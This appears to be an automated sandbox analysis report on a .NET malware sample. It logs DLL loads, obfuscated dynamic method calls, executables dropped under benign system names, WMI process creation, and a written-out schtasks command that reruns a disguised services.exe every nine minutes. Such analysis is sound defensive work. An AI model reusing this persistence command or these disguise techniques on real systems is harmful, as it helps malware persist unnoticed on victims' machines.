Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: winmmbase.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: mmdevapi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ksuser.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: avrt.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: audioses.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: powrprof.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: umpdc.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: dwrite.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: msacm32.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: midimap.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: sspicli.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: mscoree.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: apphelp.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: kernel.appcore.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: version.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: windows.storage.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: wldp.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: profapi.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: cryptsp.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: rsaenh.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: cryptbase.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: sspicli.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: mscoree.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: kernel.appcore.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: version.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: windows.storage.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: wldp.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: profapi.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: cryptsp.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: rsaenh.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: cryptbase.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: sspicli.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: mscoree.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: kernel.appcore.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: version.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: windows.storage.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: wldp.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: profapi.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: cryptsp.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: rsaenh.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: cryptbase.dll
Source: C:\ServerfontSessiondhcpcommon\System.exe	Section loaded: sspicli.dll

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Dfim58cp4J.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Dfim58cp4J.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Dfim58cp4J.exe, hE5Qy0s8jAQdVrQ9GF.cs

.Net Code: Type.GetTypeFromHandle(MmYh8lBd7dQ30tS2Uan.OkdrfXyUON(16777291)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(MmYh8lBd7dQ30tS2Uan.OkdrfXyUON(16777240)),Type.GetTypeFromHandle(MmYh8lBd7dQ30tS2Uan.OkdrfXyUON(16777237))})

Source: C:\Users\user\AppData\Local\Temp\DC.exe

File created: C:\ServerfontSessiondhcpcommon\__tmp_rar_sfx_access_check_6115593

Jump to behavior

Source: DC.exe.1.dr

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Code function: 1_2_00007FFAAC2B36C2 push esp; iretd	1_2_00007FFAAC2B36C9
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Code function: 1_2_00007FFAAC2B470A push ss; iretd	1_2_00007FFAAC2B470F
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BEF640 push ecx; ret	3_2_00BEF653
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BEEB78 push eax; ret	3_2_00BEEB96
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Code function: 8_2_00007FFAAC40CF58 push esp; ret	8_2_00007FFAAC40CF59
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC404787 push cs; retf	30_2_00007FFAAC40479F
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC43752B push ebx; iretd	30_2_00007FFAAC43756A
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC42DFD5 push edx; retf	30_2_00007FFAAC42DFDB
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC431921 pushad ; ret	30_2_00007FFAAC43192D
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC955912 push ebp; retf	30_2_00007FFAAC955A08
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC965925 push ds; retf	30_2_00007FFAAC96596F
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC9559E7 push ebp; retf	30_2_00007FFAAC955A08
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC44752B push ebx; iretd	31_2_00007FFAAC44756A
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC43DFD5 push edx; retf	31_2_00007FFAAC43DFDB
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC414787 push cs; retf	31_2_00007FFAAC41479F
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC44752B push ebx; iretd	34_2_00007FFAAC44756A
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC43DFD5 push edx; retf	34_2_00007FFAAC43DFDB
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC414787 push cs; retf	34_2_00007FFAAC41479F
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC3F4787 push cs; retf	35_2_00007FFAAC3F479F
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC42752B push ebx; iretd	35_2_00007FFAAC42756A
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC41DFD5 push edx; retf	35_2_00007FFAAC41DFDB
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 36_2_00007FFAAC3DCF58 push esp; ret	36_2_00007FFAAC3DCF59

Source: Dfim58cp4J.exe	Static PE information: section name: .text entropy: 7.31314495180415
Source: comReviewsvc.exe.3.dr	Static PE information: section name: .text entropy: 7.575572594273528
Source: services.exe.8.dr	Static PE information: section name: .text entropy: 7.575572594273528
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe.8.dr	Static PE information: section name: .text entropy: 7.575572594273528
Source: ApplicationFrameHost.exe.8.dr	Static PE information: section name: .text entropy: 7.575572594273528
Source: System.exe.8.dr	Static PE information: section name: .text entropy: 7.575572594273528

Source: Dfim58cp4J.exe, hE5Qy0s8jAQdVrQ9GF.cs	High entropy of concatenated method names: 'FNk33iGye6K9Zeu14Ac', 'Q8PkyJGnsUPvAR0FXq3', 'OP8UaDtuPo', 'UWqlvKdRAAWFJBYNkMX', 'eBTd4RdUVoyf7ieh9uq', 'IIdkAJdBkcqrpl2GbhY', 'anT5qId8tjO1PlEbAFC', 'WVk2dXdpgWQkeD7YpvK', 'rSlSDhdvVlqlG2D00P8', 'wB47KldWMeehDrT0v7M'
Source: Dfim58cp4J.exe, JBH0ktBXMPmhIsOl1Mh.cs	High entropy of concatenated method names: 'FleObIu3TY', 'daoOMm0l9D', 'XwWOXx3fXo', 'SFwOZf3l93', 'lPZOimuDkf', 'G43OmgXDKB', 'SDbOeNCf5v', 'dYK8SDmdaJ', 'D5kOYpu3Wt', 'jQkOx7D9qW'
Source: Dfim58cp4J.exe, x8qnFwBlJiTIcJI7DNZ.cs	High entropy of concatenated method names: 'id2B7ik6w6', 'dApBt74E00', 'N9jB9Hbdva', 'nSLBTQia4i', 'dr6B5eM3bH', 'JHNBPVarnj', 'aGkBLeeFPh', 'or1BNa4OUm', 'CVJBbKpmMF', 'zpnBMeo4Xe'
Source: Dfim58cp4J.exe, MmYh8lBd7dQ30tS2Uan.cs	High entropy of concatenated method names: 'OkdrfXyUON', 'pN4rHcYqNh', 'Drv0EvdjoZgtxmHCvcA', 'NVeEJ7d14mF8xMW67e9', 'IIHfuPdujGZagt2yJJW', 'KQyd1idEHgj5m2ihBVS', 'jkKaOPdDcInO7UWkZgD'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe

File created: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe

Jump to dropped file

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\DRWwxNDB.log	Jump to dropped file
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File created: C:\Users\user\AppData\Local\Temp\DC.exe	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\xRmeReqW.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\OyuueWqt.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\MnYteEKs.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\wcGwEkbJ.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\VWrJOgQa.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\ServerfontSessiondhcpcommon\System.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DC.exe	File created: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\fFKZyJVH.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\aQQAtfnE.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\GQkmowWr.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\GKmeiJoz.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\eIjRcJGM.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\nzxGUrLb.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Jump to dropped file

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\eIjRcJGM.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\xRmeReqW.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\fFKZyJVH.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\VWrJOgQa.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\OyuueWqt.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File created: C:\Users\user\Desktop\MnYteEKs.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\GKmeiJoz.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\DRWwxNDB.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\aQQAtfnE.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\GQkmowWr.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\wcGwEkbJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File created: C:\Users\user\Desktop\nzxGUrLb.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /f

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
